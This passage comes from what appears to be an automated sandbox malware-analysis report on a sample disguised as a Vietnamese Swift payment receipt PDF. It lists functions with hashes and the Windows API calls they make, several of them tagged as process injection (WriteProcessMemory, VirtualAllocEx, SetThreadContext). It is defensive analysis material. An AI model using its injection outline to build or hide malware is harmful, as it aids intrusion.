Opcode Fuzzy Hash: fa0fa26ee3e307c768155f566fc456da33557f97e9277a63e5dcbd9b1062217f
Instruction Fuzzy Hash: 1F41F6B5A00209CFDB14CF99C488BABBBF5FF88314F248459D519A7361D775A841CFA0

Function 0122977C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 0122AC61

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 984b606e4f7bdc38d9cf578f8b2eb14c0a256ee5ebafc0d63e025c496086f98f
Instruction ID: df76e4b450bef887d2999778cbe9381ed7c8d3f0c9a0502ac8e89035c1183888
Opcode Fuzzy Hash: 984b606e4f7bdc38d9cf578f8b2eb14c0a256ee5ebafc0d63e025c496086f98f
Instruction Fuzzy Hash: 2841E3B0C0071DDBEB24CFA9C944BDEBBB5BF84704F20806AD508AB651DBB56945CF90

Function 0A2A0006 Relevance: 1.6, APIs: 1, Instructions: 94
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A2A00D0

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8a0af7f8d4f550dd4cfaaf2d2f7f8c91abd7879eb5f22ed1d1f768e2a62708df
Instruction ID: 3ac4fdda58f392f3280704d0198d0ca11bd7d1c5efe237c7fae35b1a69c5d176
Opcode Fuzzy Hash: 8a0af7f8d4f550dd4cfaaf2d2f7f8c91abd7879eb5f22ed1d1f768e2a62708df
Instruction Fuzzy Hash: 2531897191538A8FDB11CFA9C8807DEBFF0FF4A320F0484AAE954AB251D7789950CB61

Function 0A2A0128 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A2A01B0

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 01475e75ad36d5979cf071cbb8123a706aa5c8c7c662b6dfcab1569cafb25c74
Instruction ID: 05b3a367848073b2ce004a945dfcf972f365d36824e40dafe523fb3da5c18d07
Opcode Fuzzy Hash: 01475e75ad36d5979cf071cbb8123a706aa5c8c7c662b6dfcab1569cafb25c74
Instruction Fuzzy Hash: 1921467180034ADFDB10CFAAC8807EEBBB5FF48310F10842AE558A7241D7799515DBA4

Function 0A2A0040 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A2A00D0

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ed319632cccd2fa035e96a72417bae53ea459ce54bd505a5197aeb002eb0cde7
Instruction ID: c4c0bb63baa069009643ba4c499fd1b344f3920fd2618ddbfc983d7e7d374ed3
Opcode Fuzzy Hash: ed319632cccd2fa035e96a72417bae53ea459ce54bd505a5197aeb002eb0cde7
Instruction Fuzzy Hash: 952126719103499FDB10CFAAC881BDEBBF5FF48310F108429E959A7240D7B99954CBA4

Function 0538FEA9 Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0538FF2E

Memory Dump Source

Source File: 00000000.00000002.2174832958.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5380000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 399c43934013f4887b97f7b3853aca14c40223a09f1343aa8239e1678beadc31
Instruction ID: 6ba1d588228411d8a76c79392c29985b6472d0363eed4b5e11325721f3323b63
Opcode Fuzzy Hash: 399c43934013f4887b97f7b3853aca14c40223a09f1343aa8239e1678beadc31
Instruction Fuzzy Hash: 222157719003098FDB14DFAAC4817AEBBF4AF88324F14842AE519A7240CBB89945CFA0

Function 05342920 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 053429AF

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 062a1d5a14d1e675ffa260fa50e54aa72aab484d70b0ef04aaedcccd7489a740
Instruction ID: 52ade4cf555667ec060b82f61c7e911ebde4fde7b9f772e69c716aed559cd875
Opcode Fuzzy Hash: 062a1d5a14d1e675ffa260fa50e54aa72aab484d70b0ef04aaedcccd7489a740
Instruction Fuzzy Hash: FE21D2B59002099FDB10CFAAD984ADEBBF5FB48320F14801AE958A3350D379A954CFA4

Function 0A2A0130 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A2A01B0

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 35b4ae3334d1c9f8d77e083b02acb586aed22aba692e8f4418ff6318a1b62573
Instruction ID: 1d9934bf146a28b8a65a1f695fe4b00781b09fe4f0016878b72454553915b6ea
Opcode Fuzzy Hash: 35b4ae3334d1c9f8d77e083b02acb586aed22aba692e8f4418ff6318a1b62573
Instruction Fuzzy Hash: CB2128B18003499FDB10DFAAC881BEEBBF5FF48310F108429E559A7240D7799554DBA5

Function 0538FEB0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0538FF2E

Memory Dump Source

Source File: 00000000.00000002.2174832958.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5380000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9a366091420e576fb1b1066922ffd8dd100e07ccb7f82fc4b2b7f36cc28acba9
Instruction ID: fb46765bd89a46fd98d8b348d7811fdadc154819f5a6ec951c8be1698b61bb4b
Opcode Fuzzy Hash: 9a366091420e576fb1b1066922ffd8dd100e07ccb7f82fc4b2b7f36cc28acba9
Instruction Fuzzy Hash: 622149719003098FDB14DFAAC4857EEBBF4FF88324F14842AD559A7240DBB89945CFA5

Function 05342928 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 053429AF

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0dfe471e9ccd1421c5e2e18c5f8af99a9ca0222ddaa2892ad4fe26dd02019191
Instruction ID: 9f3ee1297efb828b04c900063f65eddd45f6f7727f24c3b78350f205d0579a8e
Opcode Fuzzy Hash: 0dfe471e9ccd1421c5e2e18c5f8af99a9ca0222ddaa2892ad4fe26dd02019191
Instruction Fuzzy Hash: E621E4B59002099FDB10CFAAD984ADEBFF4FF48320F14801AE958A3310D374A954CFA0

Function 053408B0 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05340922

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 30177820787732d55243986866235c023417d04da21b7bb24617d430194c4dd5
Instruction ID: 86a171d3f6d13048801fe8d54f7ef05f6c6ca457ae4d92594d652e3453601e2a
Opcode Fuzzy Hash: 30177820787732d55243986866235c023417d04da21b7bb24617d430194c4dd5
Instruction Fuzzy Hash: 272136B69003499FDB14CFAAC444BDFFBF4AF48310F10841AE559AB210C3B5A545CFA1

Function 01225950 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000,?,?,?,?,?,24C75EC2,?,012256CC), ref: 012259C8

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 1225cfb93076593491cbc3491a0aaa29b2ff0e0b6ca97a1c47061f109e920b8b
Instruction ID: 43c85ef09e1a71cbe128c49b004b378436ebabd59a48dee25624ca721f75c5f4
Opcode Fuzzy Hash: 1225cfb93076593491cbc3491a0aaa29b2ff0e0b6ca97a1c47061f109e920b8b
Instruction Fuzzy Hash: 5A1130B1C0061A9BCB00CF9AC545BDEFBB4FF88320F10811AE918A3200C374A950CFA1

Function 01220820 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000,?,?,?,?,?,24C75EC2,?,012256CC), ref: 012259C8

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 24d66c02416d7d1b617492a62260fc73004d7d8ef6f07423d1ce947ba0ee7af8
Instruction ID: 77ab1952cb32a7f067e71e0379f64e5941e91b7aaf5a94ff0b353fe98d00f9a2
Opcode Fuzzy Hash: 24d66c02416d7d1b617492a62260fc73004d7d8ef6f07423d1ce947ba0ee7af8
Instruction Fuzzy Hash: 2F1133B1D1061A9BCB00CF9AC544BDEFBB4FF48220F10811AE918A7200D374A914CFE1

Function 0534FF20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0534FF8E

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 96c1c2c67ac12230d0adbcd5ed77d1091f57db7b73486ff33ef14e3b32735f0a
Instruction ID: 8ef591e42ab4c61414c2dc867bd3cf11be3c9c953e0bfdf4cddf7f612f3457ae
Opcode Fuzzy Hash: 96c1c2c67ac12230d0adbcd5ed77d1091f57db7b73486ff33ef14e3b32735f0a
Instruction Fuzzy Hash: F01156728002499FDB10DFAAC845BDFBBF5EF88320F148419E519A7250C775A550CFA0

Function 053408B8 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05340922

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 02bc35282ee3262f5965b47ba00619f8236870bad01149571bfd0cdbe59eede3
Instruction ID: c43791240d1fb254d035e9b6de9be5e095a4f6067a00e19ee391c411efec7c77
Opcode Fuzzy Hash: 02bc35282ee3262f5965b47ba00619f8236870bad01149571bfd0cdbe59eede3
Instruction Fuzzy Hash: FE11F3B69003499FDB14CFAAD544BDEFBF4BF88320F10842AE559A7210C3B5A545CFA5

Function 0A2A2B70 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0A2A2BD5

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d1af7d2bd9723ba617806a80f9a4f0da4dcb5a5086bc72b3c917bc0382e8d85e
Instruction ID: fb452ca9666cb6bf197e5de3f8b96037c9dd6a327804b111f4f7549cd25e586d
Opcode Fuzzy Hash: d1af7d2bd9723ba617806a80f9a4f0da4dcb5a5086bc72b3c917bc0382e8d85e
Instruction Fuzzy Hash: 031123B6804249DFDB10CF9AC545BDEBBF8EB48324F20881AD558A7210C3B9A544CFA5

Function 0122082C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000), ref: 01225A67

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0de189bf59dc2ebfc2075e45cfd1952a504bfb33c984751adc09917e1fd14929
Instruction ID: 78027ff11afae2e814bf13ff2a4023f3c4543b111aaea55090e66dd638d48b46
Opcode Fuzzy Hash: 0de189bf59dc2ebfc2075e45cfd1952a504bfb33c984751adc09917e1fd14929
Instruction Fuzzy Hash: 231128B1810359CFDB10DF9AC585BEEBBF4EF48320F108469D558A3251D7B8A944CFA5

Function 01225A02 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000), ref: 01225A67

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c84ee0bc5517fe0a863e7f1dffee0f9b98d2758d8a4618b0c6372fd46b8e5eb9
Instruction ID: 56e2c13de7b44c203fa1fc3c113c17f2d8191b35a6520751c3f388b58ed6fc11
Opcode Fuzzy Hash: c84ee0bc5517fe0a863e7f1dffee0f9b98d2758d8a4618b0c6372fd46b8e5eb9
Instruction Fuzzy Hash: F51113B180035ACFDB10DF9AC585BEEBBF4AF48320F24845AD558A3350D7B8A944CBA5

Function 0A2A2B78 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0A2A2BD5

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: cab99921b2343848aa1293c2b19912b0cba9a2a9772c981ce6d70bbf5fcee565
Instruction ID: a440c7d3cb931e13b2b56a90a14c923ffbc65e23c39bbd8c88b37d1bd1ac628d
Opcode Fuzzy Hash: cab99921b2343848aa1293c2b19912b0cba9a2a9772c981ce6d70bbf5fcee565
Instruction Fuzzy Hash: 6D11F2B5800349DFDB10CF9AC985BDEBBF8EB48320F108419E558A7210C3B9A544CFA1

Function 0103D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159419003.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_103d000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377b3b56baa57e20584ec582bce197891d3a18fb0242e25e6cf942639433f105
Instruction ID: 12d54bea9b4d17b62d67903e762f22226d80f10407ab7243bf028436c2759e3d
Opcode Fuzzy Hash: 377b3b56baa57e20584ec582bce197891d3a18fb0242e25e6cf942639433f105
Instruction Fuzzy Hash: C2213672100200EFDB05DF94D9C0B6ABFA9FBC4320F60C5A9E9890B256C736E456CBA1

Function 0104D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159468132.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104d000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb66e7ef3710bef5a4c2bca16b0652e686c97f2fae707c240e209ae78cf36a66
Instruction ID: 4ec943502fc921aceb108e183394be8b3f909235431c209b6557dcb589a8e8eb
Opcode Fuzzy Hash: fb66e7ef3710bef5a4c2bca16b0652e686c97f2fae707c240e209ae78cf36a66
Instruction Fuzzy Hash: 6F2137B1604200EFDB05DF94D6C0B29BBA1FBA4324F20C6BDE9894B252C376D406CB61

Function 0104D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159468132.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104d000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e698bbb3f0eb91daafcac0a32abeb0c63fef8a4303254e1af6209e2fc9181a
Instruction ID: c54564b030f47836320438a7165a81e1cf117770907b879bac2da1ce6b821b58
Opcode Fuzzy Hash: b0e698bbb3f0eb91daafcac0a32abeb0c63fef8a4303254e1af6209e2fc9181a
Instruction Fuzzy Hash: 4A2100B5604200EFDB15DF94D9C0B2ABBA1EB94314F20C5BDE98A0B252C37AD406CB61

Function 0104D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159468132.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104d000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73f0914433524c90f7c6582340915f80a6d54043174a48cfd5a4d9527fee3b2
Instruction ID: 3f9d9d722d3c2490d890d4e888e227d97e6b971b11ee85ecab4b87c51018e5a1
Opcode Fuzzy Hash: c73f0914433524c90f7c6582340915f80a6d54043174a48cfd5a4d9527fee3b2
Instruction Fuzzy Hash: 6F2180B55083809FCB02CF54D9D4711BFB1EB46214F28C5EAD8898B2A7C33AD806CB62

Function 0103D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159419003.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_103d000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 62cbf289aab3b1aac400be89d744fb1295ba434d7d2a385c3739ab4369f71de1
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: CC110076404280DFCB02CF44D9C0B56BFB2FB84324F24C6A9D8490B657C33AE45ACBA2

Function 0104D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159468132.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104d000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: a16f92caa8204eb0a14f28afb9cfe7439a85bdd583559a22b56896bb6b157bbb
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 5311BBB5504280DFCB02DF54C6C4B15BBA1FB94224F24C6A9D8894B2A6C33AD40ACB61

Non-executed Functions

Function 05388C80 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174832958.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5380000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f62c3d6901436f5ddf82c66d2a0531eeccd464c11b08b67236639b51f4a3336
Instruction ID: 6691665de9c0edff3e98d53d6c278b8a9d2fe7b73c7264f8becd4478d867202e
Opcode Fuzzy Hash: 5f62c3d6901436f5ddf82c66d2a0531eeccd464c11b08b67236639b51f4a3336
Instruction Fuzzy Hash: 57524C34A003568FCB14DF28C844B99B7B2FF89314F2586A9D5586F3A1DBB1AD86CF41

Function 05388C5B Relevance: .6, Instructions: 586COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174832958.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5380000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a154a40c8d952cc40d8c9d9a3c58082073e46b9c777cfa42f3ff0b4d9e615521
Instruction ID: c0f160ac1597255791e0f1551ff0e28dc9321781874caa631a37036a11aa8a68
Opcode Fuzzy Hash: a154a40c8d952cc40d8c9d9a3c58082073e46b9c777cfa42f3ff0b4d9e615521
Instruction Fuzzy Hash: 2A525D34A003568FCB14DF28C844B99B7B2FF85314F2586A9D5586F3A2DBB1A986CF41

Function 0A2A5E58 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0e44ee2072f851e16384992cd1799dafb8847fd8e84f99d01e471322530a77
Instruction ID: 8e156405f9633845fa2f38bd634d3deb3238415d71c51426d05be316d78af1a0
Opcode Fuzzy Hash: 3b0e44ee2072f851e16384992cd1799dafb8847fd8e84f99d01e471322530a77
Instruction Fuzzy Hash: 28D1DB71B20215AFDB29DB75C920B6FB7E6AF98700F18447AD146CB391DB34E802CB91

Function 053451C0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96cd58424eb099ca4738d47fd60d40756b586c7f667c0aa069d83e0bb76b645
Instruction ID: 7e3feea2fbfc8c1e972408c879f63459d9f28c8c5efc6559260286a46083883c
Opcode Fuzzy Hash: f96cd58424eb099ca4738d47fd60d40756b586c7f667c0aa069d83e0bb76b645
Instruction Fuzzy Hash: 3F12D0B1C857869BE710CF25F8889893BB1F745328BD44B08D2652B3D1D7F91AAACF44

Function 0A2A4670 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2176507801.000000000A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2a0000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85dd5d9b75361f8d768cfe7a879efb170c243d011f21fb891e39ed045f8ee787
Instruction ID: e6c1319719766a6bc3ae613da7a94cb8ecb9c67bea8e78f5207286b9b38f8fb3
Opcode Fuzzy Hash: 85dd5d9b75361f8d768cfe7a879efb170c243d011f21fb891e39ed045f8ee787
Instruction Fuzzy Hash: C3D1D234A10605CFDB18DF69C598AA9B7F1BF8D705F2680A8E506AB361DB71ED40CF60

Function 053441A4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19685545af635bdd4727664a51bd58587908faef66b287f28f8f92afd0467987
Instruction ID: a4abbb011bfd15c29cc5349ee9e36210ab2250b953c492ba4fb2ca3e3783656e
Opcode Fuzzy Hash: 19685545af635bdd4727664a51bd58587908faef66b287f28f8f92afd0467987
Instruction Fuzzy Hash: 0CA15C32E002198FCF09DFA5D844AAEB7F2FF84301B15857AE906AB261DB71E915CF40

Function 053451B0 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174696903.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88eebf410d91235c5abbb459a0133f894104082908edfe3dc9c7a9c13383831a
Instruction ID: c3c2cc74e92a341bf16a306000bb1c82af8af8e318d785a78de40bbb8073a000
Opcode Fuzzy Hash: 88eebf410d91235c5abbb459a0133f894104082908edfe3dc9c7a9c13383831a
Instruction Fuzzy Hash: 5BC135B1C817868BD710DF25F8889897BB1FB85324F944B08D2612B3D1D7F81AAACF44

Function 01223471 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159987302.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cc26a9a1eb28a63df67051168c03a70900902e37c818e8e49756ba575d114c4
